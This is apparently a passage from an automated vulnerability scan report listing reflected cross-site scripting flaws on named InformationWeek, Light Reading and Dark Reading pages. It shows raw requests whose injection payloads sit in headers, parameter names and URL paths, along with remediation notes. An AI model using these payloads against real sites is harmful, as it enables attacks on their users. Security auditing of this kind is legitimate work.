GET /news/infrastructure/ethernet/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1a45c"-alert(1)-"52d89e7f6ea Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 13 Dec 2010 03:23:16 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Mon, 13 Dec 2010 03:23:16 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=1GX1VSYQ2A5LXQE1GHOSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31894
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1a45c"-alert(1)-"52d89e7f6ea"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be109"-alert(1)-"bffe0260edf was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /archives.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)be109"-alert(1)-"bffe0260edf Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Mon, 13 Dec 2010 03:24:50 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Mon, 13 Dec 2010 02:24:49 GMT Expires: Mon, 11 Apr 2011 22:24:49 GMT Etag: s200805.p200805 Content-Length: 177192 Set-Cookie: lightreading%5Flastvisit=12%2F12%2F2010+10%3A24%3A49+PM; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/ Set-Cookie: lightreading%5Fvisits=1; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/ Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)be109"-alert(1)-"bffe0260edf"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e0ef"-alert(1)-"58f32a845f5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6e0ef"-alert(1)-"58f32a845f5 Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Mon, 13 Dec 2010 03:33:59 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 259711 Set-Cookie: lightreading%5Flastvisit=12%2F12%2F2010+10%3A33%3A58+PM; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/ Set-Cookie: lightreading%5Fvisits=1; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6e0ef"-alert(1)-"58f32a845f5"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61c1f"-alert(1)-"14b12173567 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /calendar_webinars.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)61c1f"-alert(1)-"14b12173567 Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Mon, 13 Dec 2010 03:27:22 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 239411 Set-Cookie: lightreading%5Flastvisit=12%2F12%2F2010+10%3A27%3A21+PM; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/ Set-Cookie: lightreading%5Fvisits=1; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)61c1f"-alert(1)-"14b12173567"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bc6c"-alert(1)-"9bf08f4672b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /document.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1bc6c"-alert(1)-"9bf08f4672b Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Mon, 13 Dec 2010 03:32:33 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 259761 Set-Cookie: lightreading%5Flastvisit=12%2F12%2F2010+10%3A32%3A33+PM; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/ Set-Cookie: lightreading%5Fvisits=1; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1bc6c"-alert(1)-"9bf08f4672b"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d7f2"-alert(1)-"493dca2071d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live/event_information.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2d7f2"-alert(1)-"493dca2071d Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Mon, 13 Dec 2010 03:27:26 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 176572 Set-Cookie: lightreading%5Flastvisit=12%2F12%2F2010+10%3A27%3A25+PM; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/ Set-Cookie: lightreading%5Fvisits=1; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2d7f2"-alert(1)-"493dca2071d"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
1.83. http://analytics.informationweek.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ab5f3--><script>alert(1)</script>6d288c3a83b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?ab5f3--><script>alert(1)</script>6d288c3a83b=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... gin?service=http%3A%2F%2Fanalytics.informationweek.com%2F%3Fab5f3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6d288c3a83b%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/?ab5f3--><script>alert(1)</script>6d288c3a83b=1"> ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fe09"-alert(1)-"b96a344b969 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8fe09"-alert(1)-"b96a344b969 Connection: close
1.85. http://www.darkreading.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95fb2"><script>alert(1)</script>cc29b91effa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?95fb2"><script>alert(1)</script>cc29b91effa=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af580'%3bb88f87bc89a was submitted in the REST URL parameter 3. This input was echoed as af580';b88f87bc89a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/evil_bytesaf580'%3bb88f87bc89a/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61170"><script>alert(1)</script>23847e95b68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blog/archives/evil_bytes61170"><script>alert(1)</script>23847e95b68/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7b4c"><a>ab17b4636b8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blog/archives/evil_bytes/index.htmlc7b4c"><a>ab17b4636b8 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13c8e"-alert(1)-"aa8e6fae200 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/evil_bytes/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)13c8e"-alert(1)-"aa8e6fae200 Connection: close